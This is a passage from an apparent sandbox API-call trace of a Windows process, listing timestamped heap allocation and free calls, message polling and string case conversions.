(HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0216.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0216.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0216.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0216.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0216.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0216.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0216.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0216.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80a8) returned 0x2f3c228 [0216.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0216.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0216.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0216.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0216.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0216.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0216.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0216.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0216.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0216.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0216.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0216.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0216.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0216.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0216.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0216.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0216.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0216.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0216.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0216.533] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0216.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0216.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0216.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0216.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0216.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0216.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0216.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0216.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0216.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0216.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0216.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0216.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0216.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0216.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80a1) returned 0x2f442d8 [0216.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0216.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0216.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80a1) returned 0x2e80330 [0216.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0216.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0216.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0216.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0216.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0216.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0216.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f442d8 | out: hHeap=0x970000) returned 1 [0216.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0216.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0216.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0216.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0216.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0216.537] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0216.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0216.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0216.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0216.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0216.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0216.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0216.537] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0216.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0216.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0216.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0216.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0216.538] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0216.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0216.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0216.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0216.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0216.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0216.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0216.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0216.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0216.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0216.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0216.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0216.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0216.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0216.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0216.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0216.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0216.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0216.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0216.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0216.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0216.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0216.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0216.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0216.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0216.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0216.538] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0216.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0216.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0216.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0216.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0216.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0216.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0216.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0216.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0216.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0216.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0216.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0216.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0216.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0216.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0216.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0216.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0216.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0216.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0216.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0216.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0216.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0216.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0216.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0216.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0216.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0216.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0216.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0216.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0216.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0216.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0216.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0216.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0216.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0216.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0216.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0216.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0216.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0216.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0216.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0216.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0216.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0216.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0216.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80a1) returned 0x2f442d8 [0216.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0216.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f442d8 | out: hHeap=0x970000) returned 1 [0216.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0216.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0216.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0216.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0216.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0216.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0216.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0216.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0216.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0216.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0216.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0216.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0216.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0216.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0216.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0216.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0216.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0216.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0216.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0216.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0216.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0216.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0216.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0216.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0216.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0216.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0216.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0216.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0216.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0216.541] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0216.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0216.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0216.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0216.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0216.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0216.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0216.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0216.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0216.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0216.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0216.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0216.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0216.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0216.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0216.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0216.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0216.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0216.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0216.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0216.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0216.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0216.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0216.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0216.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0216.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0216.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0216.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0216.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0216.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0216.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0216.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0216.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0216.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0216.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0216.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0216.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0216.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0216.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0216.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0216.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0216.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0216.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0216.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0216.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0216.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0216.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0216.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0216.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0216.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0216.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0216.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0216.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0216.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0216.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0216.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0216.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0216.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0216.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0216.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0216.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0216.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0216.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0216.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0216.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0216.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0216.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0216.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0216.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0216.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0216.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0216.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0216.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0216.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0216.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0216.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0216.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0216.545] WideCharToMultiByte (in: CodePage=0x0, 